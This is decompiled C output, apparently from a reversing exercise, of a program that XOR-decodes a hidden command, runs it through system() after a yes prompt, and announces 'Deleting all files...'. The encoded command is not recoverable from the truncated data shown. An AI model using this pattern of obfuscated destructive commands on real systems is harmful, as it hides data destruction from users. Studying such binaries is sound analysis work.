//
// This file was generated by the Retargetable Decompiler
// Website: https://retdec.com
// Copyright (c) Retargetable Decompiler <info@retdec.com>
//

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// ------------------------ Structures ------------------------

struct _IO_FILE {
    int32_t e0;
};

// --------------------- Global Variables ---------------------

char * g1 = "&"; // 0x400b40
char * g2 = ","; // 0x400d80
char * g3 = "\xc4"; // 0x400fc0
char * g4 = "\xa3"; // 0x4010c0
char * g5 = "\n"; // 0x4011c0
char * g6; // 0x4013c0
char * g7 = "\xe9"; // 0x4015c0
char * g8 = "\xe3"; // 0x401840
struct _IO_FILE * g9 = NULL; // 0x601e70
struct _IO_FILE * g10 = NULL; // 0x601e78

// ------------------------ Functions -------------------------

// Address range: 0x400760 - 0x400956
int main(int argc, char ** argv) {
    // 0x400760
    char * lineptr; // bp-2728, 0x400760
    int64_t v1 = (int64_t)&lineptr; // 0x400770
    int64_t v2; // bp-2312, 0x400760
    __asm_rep_movsd_memcpy((char *)&v2, (char *)&g1, 133);
    int64_t v3; // bp-1780, 0x400760
    __asm_rep_movsd_memcpy((char *)&v3, (char *)&g2, 133);
    for (int64_t i = 0; i < 529; i += 4) {
        int64_t v4 = i + v1;
        putchar(*(int32_t *)(v4 + 416) ^ *(int32_t *)(v4 + 948));
    }
    // 0x4007b2
    putchar(32);
    lineptr = NULL;
    int64_t n; // bp-2720, 0x400760
    getline(&lineptr, (int32_t *)&n, g10);
    if (strcmp("y\n", lineptr) != 0) {
        // 0x4007ea
        puts("You selected no. Quitting.");
        // 0x400948
        return 0;
    }
    // 0x4007f9
    int64_t v5; // bp-2712, 0x400760
    __asm_rep_movsd_memcpy((char *)&v5, (char *)&g3, 50);
    int64_t v6; // bp-2512, 0x400760
    __asm_rep_movsd_memcpy((char *)&v6, (char *)&g4, 50);
    int64_t * mem = malloc(50); // 0x400822
    int64_t v7 = 0;
    int64_t v8 = 4 * v7 + v1;
    int32_t v9 = *(int32_t *)(v8 + 216); // 0x40082a
    int32_t v10 = *(int32_t *)(v8 + 16); // 0x400831
    int64_t v11 = v7 + 1; // 0x400841
    sprintf((char *)(v7 + (int64_t)mem), "%c", (char)(v10 ^ v9));
    while (v11 != 50) {
        // 0x40082a
        v7 = v11;
        v8 = 4 * v7 + v1;
        v9 = *(int32_t *)(v8 + 216);
        v10 = *(int32_t *)(v8 + 16);
        v11 = v7 + 1;
        sprintf((char *)(v7 + (int64_t)mem), "%c", (char)(v10 ^ v9));
    }
    int32_t system_rc = system((char *)mem); // 0x400854
    printf("Deleting all files...");
    fflush(g9);
    int32_t v12 = 10; // 0x40086e
    sleep(1);
    putchar(46);
    fflush(g9);
    v12--;
    int32_t v13 = 100; // 0x400895
    while (v12 != 0) {
        // 0x400873
        sleep(1);
        putchar(46);
        fflush(g9);
        v12--;
        v13 = 100;
    }
    usleep(0x4e20);
    putchar(46);
    fflush(g9);
    int32_t v14 = v13 - 1; // 0x4008bc
    v13 = v14;
    while (v14 != 0) {
        // 0x40089c
        usleep(0x4e20);
        putchar(46);
        fflush(g9);
        v14 = v13 - 1;
        v13 = v14;
    }
    // 0x4008c0
    int64_t v15; // bp-1248, 0x400760
    int64_t v16 = &v15; // 0x4008c2
    int64_t v17; // bp-636, 0x400760
    int64_t v18 = &v17; // 0x4008ca
    if (system_rc == 0) {
        // 0x40090f
        __asm_rep_movsd_memcpy((char *)&v15, (char *)&g7, 153);
        __asm_rep_movsd_memcpy((char *)&v17, (char *)&g8, 153);
        int64_t v19 = 0;
        putchar(*(int32_t *)(v19 + v16) ^ *(int32_t *)(v19 + v18));
        int64_t v20 = v19 + 4; // 0x400946
        while (v19 != 608) {
            // 0x40092d
            v19 = v20;
            putchar(*(int32_t *)(v19 + v16) ^ *(int32_t *)(v19 + v18));
            v20 = v19 + 4;
        }
    } else {
        // 0x4008d4
        __asm_rep_movsd_memcpy((char *)&v15, (char *)&g5, 117);
        __asm_rep_movsd_memcpy((char *)&v17, (char *)&g6, 117);
        int64_t v21 = 0;
        putchar(*(int32_t *)(v21 + v16) ^ *(int32_t *)(v21 + v18));
        int64_t v22 = v21 + 4; // 0x40090b
        while (v21 != 464) {
            // 0x4008f2
            v21 = v22;
            putchar(*(int32_t *)(v21 + v16) ^ *(int32_t *)(v21 + v18));
            v22 = v21 + 4;
        }
    }
    // 0x400948
    return 0;
}

// --------------- Dynamically Linked Functions ---------------

// int fflush(FILE * stream);
// _IO_ssize_t getline(char ** restrict lineptr, size_t * restrict n, FILE * restrict stream);
// void * malloc(size_t size);
// int printf(const char * restrict format, ...);
// int putchar(int c);
// int puts(const char * s);
// unsigned int sleep(unsigned int seconds);
// int sprintf(char * restrict s, const char * restrict format, ...);
// int strcmp(const char * s1, const char * s2);
// int system(const char * command);
// int usleep(__useconds_t useconds);

// --------------------- Meta-Information ---------------------

// Detected compiler/packer: gcc (4.9.4)
// Detected functions: 1
